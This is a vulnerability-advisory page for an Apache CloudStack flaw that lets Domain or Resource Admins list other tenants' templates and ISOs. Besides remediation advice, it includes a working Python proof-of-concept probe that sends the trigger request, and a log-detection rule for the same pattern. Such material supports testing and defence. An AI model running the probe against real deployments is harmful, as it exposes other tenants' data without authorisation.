
CVE-2025-30675: CWE-200 Exposure of Sensitive Information to an Unauthorized Actor in Apache Software Foundation Apache CloudStack

Severity: Medium
Tags: Vulnerability, CVE-2025-30675, CWE-200
Published: Tue Jun 10 2025 (06/10/2025, 23:12:23 UTC)
Source: CVE Database V5
Vendor/Project: Apache Software Foundation
Product: Apache CloudStack

Description

In Apache CloudStack, a flaw in access control affects the listTemplates and listIsos APIs. A malicious Domain Admin or Resource Admin can exploit this issue by intentionally specifying the 'domainid' parameter along with the 'filter=self' or 'filter=selfexecutable' values. This allows the attacker to gain unauthorized visibility into templates and ISOs under the ROOT domain. A malicious admin can enumerate and extract metadata of templates and ISOs that belong to unrelated domains, violating isolation boundaries and potentially exposing sensitive or internal configuration details. This vulnerability has been fixed by ensuring the domain resolution strictly adheres to the caller's scope rather than defaulting to the ROOT domain. Affected users are recommended to upgrade to Apache CloudStack 4.19.3.0 or 4.20.1.0.

AI-Powered Analysis

Last updated: 07/11/2025, 07:47:25 UTC

Technical Analysis

CVE-2025-30675 is a medium-severity vulnerability in Apache CloudStack, an open-source cloud computing platform used to deploy and manage large fleets of virtual machines. The flaw lies in the access-control logic of the listTemplates and listIsos APIs. A Domain Admin or Resource Admin who sets the 'domainid' parameter together with the 'self' or 'selfexecutable' filter value (in the API itself the filter is passed as 'templatefilter' for listTemplates and 'isofilter' for listIsos) causes the server to resolve the domain scope incorrectly: instead of restricting the listing to the caller's own domain, it falls back to the ROOT domain. The caller therefore receives metadata of templates and ISOs owned by unrelated domains (names, display text, OS type, owning account and domain), breaking domain isolation and potentially revealing internal configuration details that should stay confidential to each tenant.

Affected versions run from 4.0.0 up to and including 4.20.0.0. The fix shipped in 4.19.3.0 and 4.20.1.0 resolves the domain strictly from the caller's scope rather than defaulting to ROOT. The CVSS v3.1 base score is 4.7: network attack vector, low attack complexity and no user interaction, but high privileges required (a Domain Admin or Resource Admin account). The vector rates confidentiality, integrity and availability impacts as low; the direct effect of the flaw is information disclosure, and the integrity and availability components reflect what an attacker could do with the exposed metadata. No exploitation in the wild has been reported, but the issue matters in multi-tenant deployments where domain isolation is relied on as a security boundary.
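The trigger described above can be reproduced against a test management server with a small probe. The script below is an added example, not code from the Apache CloudStack project: it signs a listTemplates (or listIsos) request using CloudStack's documented API signing scheme (lowercased, key-sorted query string, HMAC-SHA1 with the secret key, base64), sends it as the Domain Admin caller with 'domainid' set to the ROOT domain and the filter set to 'self', and reports any returned items whose owning domain is outside the caller's scope. The endpoint, keys and domain ids are placeholders the operator supplies; SAMPLE_RESPONSE is a constructed response so the scope check can be exercised offline.

```python
"""Probe for CVE-2025-30675: does listTemplates/listIsos leak ROOT-domain
items to a Domain/Resource Admin who passes domainid with a 'self' filter?

Added example, not Apache CloudStack project code. Request signing follows
CloudStack's documented scheme (lowercased, key-sorted query string,
HMAC-SHA1 with the secret key, base64). ENDPOINT, API_KEY, SECRET and the
domain ids are placeholders the operator supplies; SAMPLE_RESPONSE is
constructed so the checks run offline.
"""
import base64
import hashlib
import hmac
import json
import os
import urllib.parse
import urllib.request


def canonical_query(params):
    """Lowercased, key-sorted form of the query string that CloudStack signs."""
    encoded = {k.lower(): urllib.parse.quote(str(v), safe="*").lower()
               for k, v in params.items()}
    return "&".join(f"{k}={v}" for k, v in sorted(encoded.items()))


def sign_query(params, api_key, secret):
    """Full query string with apiKey, response=json and the signature appended."""
    params = dict(params, apiKey=api_key, response="json")
    digest = hmac.new(secret.encode(), canonical_query(params).encode(),
                      hashlib.sha1).digest()
    signature = base64.b64encode(digest).decode()
    query = "&".join(f"{k}={urllib.parse.quote(str(v), safe='*')}"
                     for k, v in params.items())
    return f"{query}&signature={urllib.parse.quote(signature, safe='')}"


def foreign_items(items, allowed_domain_ids):
    """Return (id, name, domain) for items owned outside the caller's scope.

    allowed_domain_ids is the caller's own domain plus its child domains,
    i.e. what a 'self' listing may legitimately contain; anything else is
    the leak this CVE describes."""
    return [(item["id"], item["name"], item.get("domain"))
            for item in items
            if item.get("domainid") not in allowed_domain_ids]


def check_response(body, allowed_domain_ids, command="listTemplates"):
    """Pull the item list out of a list*response envelope and scope-check it."""
    envelope = body.get(f"{command.lower()}response", {})
    list_key = "template" if command.lower() == "listtemplates" else "iso"
    return foreign_items(envelope.get(list_key, []), allowed_domain_ids)


def probe(endpoint, api_key, secret, root_domainid, allowed_domain_ids,
          command="listTemplates"):
    """Send the trigger request as the admin caller and return leaked items.

    listTemplates takes its filter as 'templatefilter', listIsos as 'isofilter'."""
    filter_param = "templatefilter" if command == "listTemplates" else "isofilter"
    query = sign_query({"command": command, filter_param: "self",
                        "domainid": root_domainid}, api_key, secret)
    with urllib.request.urlopen(f"{endpoint}?{query}", timeout=30) as resp:
        body = json.load(resp)
    return check_response(body, allowed_domain_ids, command)


# Constructed listtemplatesresponse, not captured from a real server: one
# template in the caller's domain and one owned by ROOT that must never
# appear in a Domain Admin's 'self' listing.
SAMPLE_RESPONSE = {"listtemplatesresponse": {"count": 2, "template": [
    {"id": "t-1", "name": "tenant-web", "domainid": "d-tenant", "domain": "tenant-a"},
    {"id": "t-2", "name": "internal-golden-image", "domainid": "d-root", "domain": "ROOT"},
]}}


if __name__ == "__main__":
    # Offline dry run against the constructed response.
    print("leaked (sample):", check_response(SAMPLE_RESPONSE, {"d-tenant"}))
    # Live run only when credentials are supplied through the environment.
    if os.environ.get("CS_ENDPOINT"):
        leaked = probe(os.environ["CS_ENDPOINT"], os.environ["CS_API_KEY"],
                       os.environ["CS_SECRET"], os.environ["CS_ROOT_DOMAINID"],
                       set(os.environ["CS_ALLOWED_DOMAINIDS"].split(",")))
        print("vulnerable" if leaked else "not reproduced", leaked)
```

Run it with the API key and secret of a Domain Admin account in a non-ROOT domain; on a patched server the 'self' listing contains only that domain's (and its children's) items and `probe` returns an empty list. The set of allowed domain ids is obtained from listDomainChildren for the caller's domain.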

Potential Impact

For European organizations running Apache CloudStack, especially multi-tenant public clouds or shared private clouds, this vulnerability undermines the domain isolation that tenants rely on. Unauthorized access to template and ISO metadata can expose internal configuration details and image inventories, which could facilitate follow-on attacks such as targeting known weaknesses in the operating systems or software those images carry, or informing unauthorized resource provisioning. The result may be data leakage, compliance exposure (for example GDPR concerns if personal data is indirectly revealed through image names or descriptions), and erosion of trust in the provider's tenant separation. Organizations in sectors with strict data protection requirements, such as finance, healthcare and government, are particularly exposed. The leaked inventory could also aid an attacker in lateral movement across tenants, increasing the risk of broader compromise. Although exploitation requires Domain Admin or Resource Admin privileges, an insider or a compromised admin account could use this flaw to gather intelligence on other tenants' resources.

Mitigation Recommendations

European organizations should prioritize upgrading Apache CloudStack to 4.19.3.0 or 4.20.1.0 or later, where the vulnerability is patched. Beyond patching, keep the set of accounts holding Domain Admin or Resource Admin roles as small as possible, since only those roles can trigger the flaw, and review that set regularly. Audit admin API activity and domain configurations to detect anomalous usage; in particular, alert on listTemplates and listIsos calls that combine the 'domainid' parameter with a 'self' or 'selfexecutable' filter, and treat a 'domainid' equal to the ROOT domain from a non-ROOT admin as a likely probe. Network segmentation of the management API and centralized logging of API calls give early warning and forensic evidence. Review and harden domain isolation policies, and add logging and alerting for cross-domain access attempts generally. Enforce multi-factor authentication for admin accounts to reduce the risk of credential compromise. Finally, security awareness training for cloud administrators on the risks of privilege misuse is recommended.
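To make the API-monitoring recommendation concrete, the following added example (not CloudStack code) scans API log lines for the trigger pattern: a listTemplates or listIsos request that carries 'domainid' together with a 'self' or 'selfexecutable' filter, optionally narrowed to requests where 'domainid' is the ROOT domain. The sample log lines are constructed to resemble management-server API log entries (caller ids, client IP, then the raw query string); the LINE_RE layout is an assumption and should be adjusted to the exact format your deployment writes.

```python
"""Detection for the CVE-2025-30675 trigger pattern in CloudStack API logs:
listTemplates/listIsos calls that combine domainid with a 'self' or
'selfexecutable' filter, optionally only when domainid is the ROOT domain.

Added example, not CloudStack code. LOG_SAMPLE is constructed to resemble
management-server API log entries (caller ids, client IP, then the raw
query string); LINE_RE is an assumption about that layout.
"""
import re
from urllib.parse import parse_qs

LINE_RE = re.compile(
    r"\(userId=(?P<user>\d+) accountId=(?P<account>\d+)[^)]*\)\s+"
    r"(?P<ip>[0-9a-fA-F.:]+)\s+--\s+(?:GET|POST)\s+(?P<query>\S+)")

# listTemplates and listIsos name their filter parameter differently.
FILTER_PARAM = {"listtemplates": "templatefilter", "listisos": "isofilter"}
SELF_FILTERS = {"self", "selfexecutable"}


def query_params(query):
    """Lowercased-key view of a query string (first value per key)."""
    return {k.lower(): v[0] for k, v in
            parse_qs(query, keep_blank_values=True).items()}


def is_cross_domain_listing(query, root_domainid=None):
    """True when the query matches the trigger: listing command, 'self'-type
    filter and an explicit domainid (restricted to ROOT if root_domainid given)."""
    p = query_params(query)
    filt = FILTER_PARAM.get(p.get("command", "").lower())
    if filt is None or p.get(filt, "").lower() not in SELF_FILTERS:
        return False
    if "domainid" not in p:
        return False
    return root_domainid is None or p["domainid"] == root_domainid


def scan(lines, root_domainid=None):
    """Return (userId, accountId, ip, command) for every matching request."""
    hits = []
    for line in lines:
        m = LINE_RE.search(line)
        if m and is_cross_domain_listing(m["query"], root_domainid):
            hits.append((m["user"], m["account"], m["ip"],
                         query_params(m["query"])["command"]))
    return hits


# Constructed sample; ids and addresses are placeholders. Line 1 and line 3
# match the trigger, line 2 has no domainid, line 4 is not a listing call.
LOG_SAMPLE = """\
2025-06-11 09:12:01,114 INFO  [a.c.c.a.ApiServer] (qtp-17:ctx-a1) (userId=7 accountId=5 sessionId=s1) 10.20.0.14 -- GET command=listTemplates&templatefilter=self&domainid=d-root&response=json 200
2025-06-11 09:12:03,902 INFO  [a.c.c.a.ApiServer] (qtp-18:ctx-a2) (userId=7 accountId=5 sessionId=s1) 10.20.0.14 -- GET command=listTemplates&templatefilter=self&response=json 200
2025-06-11 09:12:05,331 INFO  [a.c.c.a.ApiServer] (qtp-19:ctx-a3) (userId=9 accountId=6 sessionId=s2) 10.20.0.21 -- GET command=listIsos&isofilter=selfexecutable&domainid=d-tenant-b&response=json 200
2025-06-11 09:12:07,018 INFO  [a.c.c.a.ApiServer] (qtp-20:ctx-a4) (userId=9 accountId=6 sessionId=s2) 10.20.0.21 -- GET command=listVirtualMachines&domainid=d-root&response=json 200
"""


if __name__ == "__main__":
    for hit in scan(LOG_SAMPLE.splitlines()):
        print("cross-domain listing probe:", hit)
    print("ROOT-only:", scan(LOG_SAMPLE.splitlines(), root_domainid="d-root"))
```

Without `root_domainid` the rule is broad and will also catch a Domain Admin listing one of its own child domains, which is legitimate; passing the ROOT domain id narrows it to the case the CVE describes. Pair the hits with the caller's role from listAccounts so that ROOT-domain admins, who may legitimately pass any domainid, are excluded.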


Technical Details

Data Version
5.1
Assigner Short Name
apache
Date Reserved
2025-03-25T07:15:12.974Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 6848bf863cd93dcca8312d1b

Added to database: 6/10/2025, 11:28:06 PM

Last enriched: 7/11/2025, 7:47:25 AM

Last updated: 8/9/2025, 11:14:02 AM

